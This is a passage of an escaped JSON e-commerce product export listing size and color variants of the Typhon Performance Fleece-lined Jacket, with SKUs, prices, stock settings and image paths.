Fleece-lined Jacket. After all, no man can resist ultra-soft microfleece lining. Flatlock seams make it ideal for wearing over everything from tanks and tees to high-tech base layers.<\\/p>\\n<p>&bull; Black full-zip flight jacket.<br \\/>&bull; Cocona&reg; wicking fiber.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"typhon-performance-fleece-lined-jacket-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"322\":{\"sku\":\"MJ11-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Typhon Performance Fleece-lined Jacket-XS-Red\",\"description\":\"<p>Ironmen and couch warriors both reach for the Typhon Performance Fleece-lined Jacket. After all, no man can resist ultra-soft microfleece lining. Flatlock seams make it ideal for wearing over everything from tanks and tees to high-tech base layers.<\\/p>\\n<p>&bull; Black full-zip flight jacket.<br \\/>&bull; Cocona&reg; wicking fiber.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"typhon-performance-fleece-lined-jacket-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"323\":{\"sku\":\"MJ11-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Typhon Performance Fleece-lined Jacket-S-Black\",\"description\":\"<p>Ironmen and couch warriors both reach for the Typhon Performance Fleece-lined Jacket. After all, no man can resist ultra-soft microfleece lining. Flatlock seams make it ideal for wearing over everything from tanks and tees to high-tech base layers.<\\/p>\\n<p>&bull; Black full-zip flight jacket.<br \\/>&bull; Cocona&reg; wicking fiber.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"typhon-performance-fleece-lined-jacket-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj11-black_alt1.jpg,\\/m\\/j\\/mj11-black_back.jpg\",\"image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj11-black_alt1.jpg,\\/m\\/j\\/mj11-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"324\":{\"sku\":\"MJ11-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Typhon Performance Fleece-lined Jacket-S-Green\",\"description\":\"<p>Ironmen and couch warriors both reach for the Typhon Performance Fleece-lined Jacket. After all, no man can resist ultra-soft microfleece lining. Flatlock seams make it ideal for wearing over everything from tanks and tees to high-tech base layers.<\\/p>\\n<p>&bull; Black full-zip flight jacket.<br \\/>&bull; Cocona&reg; wicking fiber.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"typhon-performance-fleece-lined-jacket-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"325\":{\"sku\":\"MJ11-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Typhon Performance Fleece-lined Jacket-S-Red\",\"description\":\"<p>Ironmen and couch warriors both reach for the Typhon Performance Fleece-lined Jacket. After all, no man can resist ultra-soft microfleece lining. Flatlock seams make it ideal for wearing over everything from tanks and tees to high-tech base layers.<\\/p>\\n<p>&bull; Black full-zip flight jacket.<br \\/>&bull; Cocona&reg; wicking fiber.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"typhon-performance-fleece-lined-jacket-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"326\":{\"sku\":\"MJ11-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Typhon Performance Fleece-lined Jacket-M-Black\",\"description\":\"<p>Ironmen and couch warriors both reach for the Typhon Performance Fleece-lined Jacket. After all, no man can resist ultra-soft microfleece lining. Flatlock seams make it ideal for wearing over everything from tanks and tees to high-tech base layers.<\\/p>\\n<p>&bull; Black full-zip flight jacket.<br \\/>&bull; Cocona&reg; wicking fiber.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"typhon-performance-fleece-lined-jacket-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj11-black_alt1.jpg,\\/m\\/j\\/mj11-black_back.jpg\",\"image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj11-black_alt1.jpg,\\/m\\/j\\/mj11-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"327\":{\"sku\":\"MJ11-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Typhon Performance Fleece-lined Jacket-M-Green\",\"description\":\"<p>Ironmen and couch warriors both reach for the Typhon Performance Fleece-lined Jacket. After all, no man can resist ultra-soft microfleece lining. Flatlock seams make it ideal for wearing over everything from tanks and tees to high-tech base layers.<\\/p>\\n<p>&bull; Black full-zip flight jacket.<br \\/>&bull; Cocona&reg; wicking fiber.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"typhon-performance-fleece-lined-jacket-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"328\":{\"sku\":\"MJ11-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Typhon Performance Fleece-lined Jacket-M-Red\",\"description\":\"<p>Ironmen and couch warriors both reach for the Typhon Performance Fleece-lined Jacket. After all, no man can resist ultra-soft microfleece lining. Flatlock seams make it ideal for wearing over everything from tanks and tees to high-tech base layers.<\\/p>\\n<p>&bull; Black full-zip flight jacket.<br \\/>&bull; Cocona&reg; wicking fiber.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"typhon-performance-fleece-lined-jacket-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"329\":{\"sku\":\"MJ11-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Typhon Performance Fleece-lined Jacket-L-Black\",\"description\":\"<p>Ironmen and couch warriors both reach for the Typhon Performance Fleece-lined Jacket. After all, no man can resist ultra-soft microfleece lining. Flatlock seams make it ideal for wearing over everything from tanks and tees to high-tech base layers.<\\/p>\\n<p>&bull; Black full-zip flight jacket.<br \\/>&bull; Cocona&reg; wicking fiber.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"typhon-performance-fleece-lined-jacket-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj11-black_alt1.jpg,\\/m\\/j\\/mj11-black_back.jpg\",\"image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj11-black_alt1.jpg,\\/m\\/j\\/mj11-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"330\":{\"sku\":\"MJ11-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Typhon 